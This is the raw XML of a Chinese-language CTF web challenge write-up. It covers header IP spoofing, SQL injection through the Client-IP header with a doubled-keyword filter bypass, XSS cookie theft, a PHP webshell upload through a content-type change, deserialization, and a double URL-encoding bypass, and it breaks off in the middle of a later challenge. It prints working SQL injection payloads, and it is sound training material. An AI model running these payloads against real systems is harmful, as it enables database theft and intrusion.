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A415" w14:textId="549EA26B" w:rsidR="007B1F2D" w:rsidRDefault="0054304E" w:rsidP="0054304E">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C9BD15" w14:textId="1CEBD123" w:rsidR="0054304E" w:rsidRDefault="0054304E" w:rsidP="0054304E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>签到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC2FB37" w14:textId="7DA7CC75" w:rsidR="0054304E" w:rsidRDefault="0054304E" w:rsidP="0054304E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看源码，发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t>.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295B9C3E" w14:textId="204C1E64" w:rsidR="0054304E" w:rsidRDefault="0054304E" w:rsidP="0054304E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FAF97BC" wp14:editId="0E5CFC6A">
            <wp:extent cx="3421677" cy="265961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86E" w14:textId="6B22EAEC" w:rsidR="0054304E" w:rsidRDefault="0054304E" w:rsidP="0054304E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现一个密码，很明显是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:t>64,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解码得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359B5825" w14:textId="531FD10C" w:rsidR="0054304E" w:rsidRDefault="0054304E" w:rsidP="0054304E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26548138" wp14:editId="12EE181D">
            <wp:extent cx="5128704" cy="108213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A243" w14:textId="7A6EC4FF" w:rsidR="0054304E" w:rsidRDefault="0054304E" w:rsidP="0054304E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05D3CA70" wp14:editId="2909DCF7">
            <wp:extent cx="4580017" cy="19889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5F9B" w14:textId="59CB07EF" w:rsidR="0054304E" w:rsidRDefault="0054304E" w:rsidP="0054304E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="0054304E">
        <w:t>Where_are_you_from_level_1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFC3C41" w14:textId="78A1EBA6" w:rsidR="0054304E" w:rsidRDefault="0054304E" w:rsidP="0054304E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>提示只有本地访问才可以得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DA48F2" w14:textId="51D5C41C" w:rsidR="0054304E" w:rsidRDefault="0054304E" w:rsidP="0054304E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="711E3E34" wp14:editId="27570E8B">
            <wp:extent cx="5274310" cy="3264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494E" w14:textId="107E5D94" w:rsidR="0054304E" w:rsidRDefault="005F1E47" w:rsidP="0054304E">
      <w:r w:rsidRPr="005F1E47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以伪造</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1E47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1E47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，伪造</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1E47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1E47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的方法有</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1E47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XFF</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1E47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1E47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x-client-ip</w:t>
      </w:r>
      <w:r>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D804AF3" w14:textId="77777777" w:rsidR="005F1E47" w:rsidRDefault="005F1E47" w:rsidP="005F1E47">
      <w:r>
        <w:t>Client-Ip: 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC81E53" w14:textId="77777777" w:rsidR="005F1E47" w:rsidRDefault="005F1E47" w:rsidP="005F1E47">
      <w:r>
        <w:t>X-Forwarded-For: 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11402C06" w14:textId="77777777" w:rsidR="005F1E47" w:rsidRDefault="005F1E47" w:rsidP="005F1E47">
      <w:r>
        <w:t>Host: 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD8B960" w14:textId="354B40F6" w:rsidR="005F1E47" w:rsidRDefault="005F1E47" w:rsidP="005F1E47">
      <w:r>
        <w:t xml:space="preserve">Referer: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="001E53EE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>www.google.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="11897A20" w14:textId="193EF1A3" w:rsidR="005F1E47" w:rsidRDefault="005F1E47" w:rsidP="005F1E47"/>
    <w:p w14:paraId="1EC8AA2C" w14:textId="5FDBB8D8" w:rsidR="005F1E47" w:rsidRDefault="005F1E47" w:rsidP="005F1E47">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改一下，得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4F200C" w14:textId="1A1FC25A" w:rsidR="005F1E47" w:rsidRDefault="005F1E47" w:rsidP="005F1E47">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10728F1D" wp14:editId="715662F8">
            <wp:extent cx="5274310" cy="1531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C3A5" w14:textId="4BFD8A56" w:rsidR="005F1E47" w:rsidRDefault="005F1E47" w:rsidP="005F1E47">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35616867" wp14:editId="438E7A7B">
            <wp:extent cx="5274310" cy="2388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F449" w14:textId="3ADE14AD" w:rsidR="005F1E47" w:rsidRDefault="005F1E47" w:rsidP="005F1E47">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="005F1E47">
        <w:t>Where_are_you_from_level_</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CBF58E" w14:textId="517220FE" w:rsidR="005F1E47" w:rsidRDefault="005F1E47" w:rsidP="005F1E47">
      <w:r w:rsidRPr="005F1E47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>client-ip</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1E47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入，而且是加了过滤的注入，过滤是直接把关键字给替换成空，而且也没有循环匹配，所以我们可以用双写来绕过过滤。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2268A217" w14:textId="4348FE68" w:rsidR="005F1E47" w:rsidRDefault="005F1E47" w:rsidP="005F1E47">
      <w:r w:rsidRPr="005F1E47">
        <w:t>client-ip: 127.0.0.1',database())#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6254B552" w14:textId="13F837B1" w:rsidR="005F1E47" w:rsidRDefault="005F1E47" w:rsidP="005F1E47">
      <w:r w:rsidRPr="005F1E47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到了数据库的名字是</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1E47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>demo2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395842B8" w14:textId="347D3B4C" w:rsidR="005F1E47" w:rsidRDefault="005F1E47" w:rsidP="005F1E47">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="735823F6" wp14:editId="7FC4FDC9">
            <wp:extent cx="5274310" cy="30067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9CB7" w14:textId="757EA1E0" w:rsidR="005F1E47" w:rsidRDefault="005F1E47" w:rsidP="005F1E47">
      <w:r w:rsidRPr="005F1E47">
        <w:t>client-ip: 127.0.0.1',(selselectect/**/group_concat(table_name)/**/frfromom/**/information_schema.tables/**/where/**/table_schema='demo2'))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1614F3C2" w14:textId="048D1268" w:rsidR="005F1E47" w:rsidRDefault="005F1E47" w:rsidP="005F1E47">
      <w:r w:rsidRPr="005F1E47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后拿到表名</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1E47">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flaaag,ip_records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3307C95E" w14:textId="161082B0" w:rsidR="00F66654" w:rsidRDefault="00F66654" w:rsidP="005F1E47">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="677CF500" wp14:editId="4CC3FEBD">
            <wp:extent cx="5274310" cy="34823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4A9E" w14:textId="77777777" w:rsidR="00F66654" w:rsidRDefault="00F66654" w:rsidP="005F1E47">
      <w:r w:rsidRPr="00F66654">
        <w:t>client-ip: 127.0.0.1',(selselectect/**/group_concat(column_name)/**/frfromom/**/information_schema.columns/**/where/**/table_name='flaaag'))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208D9757" w14:textId="720D875B" w:rsidR="00F66654" w:rsidRDefault="00F66654" w:rsidP="005F1E47">
      <w:r w:rsidRPr="00F66654">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后现在注出来字段名</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66654">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id,fl4g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0EA6D9" w14:textId="7ED98F76" w:rsidR="00F66654" w:rsidRDefault="00F66654" w:rsidP="005F1E47">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43531CC2" wp14:editId="68E6F1DD">
            <wp:extent cx="5274310" cy="32486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9C72" w14:textId="42DB1C70" w:rsidR="00F66654" w:rsidRDefault="00F66654" w:rsidP="005F1E47">
      <w:r w:rsidRPr="00F66654">
        <w:t>client-ip: 127.0.0.1',(selselectect/**/fl4g/**/frfromom/**/flaaag))#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADEBCB1" w14:textId="0EFCB8EF" w:rsidR="00F66654" w:rsidRDefault="00F66654" w:rsidP="005F1E47">
      <w:r w:rsidRPr="00F66654">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，就可以拿到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66654">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66654">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104F62AC" w14:textId="20D99CE9" w:rsidR="00F66654" w:rsidRDefault="00F66654" w:rsidP="005F1E47">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21BF7618" wp14:editId="650D4B2A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4FAA" w14:textId="0EBECF7B" w:rsidR="00F66654" w:rsidRDefault="00F66654" w:rsidP="00F66654">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>_xss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492A6797" w14:textId="3F580AF8" w:rsidR="00F66654" w:rsidRDefault="00F66654" w:rsidP="00F66654">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就一个留言的位置，提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，很明显要打到管理员</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1395A646" w14:textId="2FA9B1EC" w:rsidR="00F66654" w:rsidRDefault="00F66654" w:rsidP="00F66654">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42394209" wp14:editId="29A71A9A">
            <wp:extent cx="4061812" cy="21795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7ECE" w14:textId="11215A7C" w:rsidR="00F66654" w:rsidRDefault="00F66654" w:rsidP="00F66654">
      <w:r w:rsidRPr="00F66654">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66654">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66654">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>平台的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66654">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66654">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入留言</w:t>
      </w:r>
      <w:r w:rsidR="00316689">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，得到</w:t>
      </w:r>
      <w:r w:rsidR="00316689">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4798FB92" w14:textId="5846FB51" w:rsidR="00316689" w:rsidRDefault="00316689" w:rsidP="00F66654">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E8E1BE3" wp14:editId="5959776A">
            <wp:extent cx="5274310" cy="2027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3C27" w14:textId="238BFEAF" w:rsidR="00316689" w:rsidRDefault="00316689" w:rsidP="00316689">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Web_upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB64854" w14:textId="7B440D39" w:rsidR="00316689" w:rsidRDefault="00FE0A2D" w:rsidP="00316689">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示只允许上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GIF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBC3E10" w14:textId="737E92EF" w:rsidR="00FE0A2D" w:rsidRDefault="00FE0A2D" w:rsidP="00316689">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43224E96" wp14:editId="162DBB7E">
            <wp:extent cx="4115157" cy="19813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C393" w14:textId="091118F3" w:rsidR="00FE0A2D" w:rsidRPr="00316689" w:rsidRDefault="00FE0A2D" w:rsidP="00316689">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一句话木马，用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burp</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0A2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0A2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>content-type</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0A2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0A2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>image/gif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，得到上传路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049A6EA9" w14:textId="6FF6E0C4" w:rsidR="00F66654" w:rsidRDefault="00FE0A2D" w:rsidP="00F66654">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A169EF3" wp14:editId="341666AF">
            <wp:extent cx="5274310" cy="2676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BC6" w14:textId="580E21BD" w:rsidR="00FE0A2D" w:rsidRDefault="00FE0A2D" w:rsidP="00F66654">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D47D89E" wp14:editId="284E1F29">
            <wp:extent cx="3490262" cy="100592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3231" w14:textId="7F9E0631" w:rsidR="00FE0A2D" w:rsidRDefault="00FE0A2D" w:rsidP="00F66654">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用工具连</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，拿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C607BF6" w14:textId="47EF8668" w:rsidR="00FE0A2D" w:rsidRDefault="00FE0A2D" w:rsidP="00F6665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5D4FB2" wp14:editId="178744A3">
            <wp:extent cx="5274310" cy="2362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A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137B67" wp14:editId="563B9C7F">
            <wp:extent cx="5274310" cy="1733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2E8E" w14:textId="3A84B1D9" w:rsidR="00FE0A2D" w:rsidRDefault="00FE0A2D" w:rsidP="00FE0A2D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>eb_ser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA79798" w14:textId="3D71FF9E" w:rsidR="00FE0A2D" w:rsidRPr="00FE0A2D" w:rsidRDefault="00FE0A2D" w:rsidP="00FE0A2D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE0A2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反序列化一个数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D85623" w14:textId="5968333A" w:rsidR="00FE0A2D" w:rsidRDefault="00FE0A2D" w:rsidP="00FE0A2D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37DAB2B4" wp14:editId="3BE0CF7D">
            <wp:extent cx="5274310" cy="1676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2851" w14:textId="14882B55" w:rsidR="00FE0A2D" w:rsidRDefault="00FE0A2D" w:rsidP="00FE0A2D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>ost</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0A2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传入：</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0A2D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>data=a:2:{s:4:"user";s:5:"admin";s:4:"pass";s:11:"nicaicaikan";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A55BF70" w14:textId="7576895E" w:rsidR="00FE0A2D" w:rsidRDefault="00FE0A2D" w:rsidP="00FE0A2D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拿到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F80D79A" w14:textId="300BD4CD" w:rsidR="00103CDF" w:rsidRDefault="00103CDF" w:rsidP="00FE0A2D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6413D5A6" wp14:editId="44D4BAB7">
            <wp:extent cx="5274310" cy="28270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98A" w14:textId="764CC9B6" w:rsidR="00103CDF" w:rsidRDefault="00103CDF" w:rsidP="00103CDF">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:t>rlencode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE33FC7" w14:textId="12B365C9" w:rsidR="00103CDF" w:rsidRDefault="00103CDF" w:rsidP="00103CDF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用御剑或者其他工具扫目录，发现备份文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00103CDF">
        <w:t>index.phps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07549256" w14:textId="40233345" w:rsidR="00103CDF" w:rsidRDefault="00103CDF" w:rsidP="00103CDF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="453D9E24" wp14:editId="174EABD8">
            <wp:extent cx="5274310" cy="18389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70F2" w14:textId="5ECFDC36" w:rsidR="00D33ADA" w:rsidRDefault="00D33ADA" w:rsidP="00103CDF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33ADA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>双写</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33ADA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidRPr="00D33ADA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146C783C" w14:textId="268723F5" w:rsidR="00D33ADA" w:rsidRDefault="00D33ADA" w:rsidP="00103CDF">
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>/index.php?id=%2561dmin</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="297B3F3A" w14:textId="673FFDD3" w:rsidR="00D33ADA" w:rsidRDefault="00D33ADA" w:rsidP="00103CDF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FB42891" wp14:editId="7AFE9882">
            <wp:extent cx="5274310" cy="19640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6B4F" w14:textId="7B878DEC" w:rsidR="00D33ADA" w:rsidRDefault="00D33ADA" w:rsidP="00D33ADA">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>独角兽商店</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5CA2C7" w14:textId="525C9427" w:rsidR="00D33ADA" w:rsidRPr="00D33ADA" w:rsidRDefault="00D33ADA" w:rsidP="00D33ADA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>点击进去之后是一个购买独角兽的界面，有四种类型的独角兽，前三种的价格比较便宜，最后的独角兽价格比较贵。我们先尝试购买前三种独角兽</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，都操作失败，并且金额只能是一个字符，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猜测只要购买了第四只独角兽，就能获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
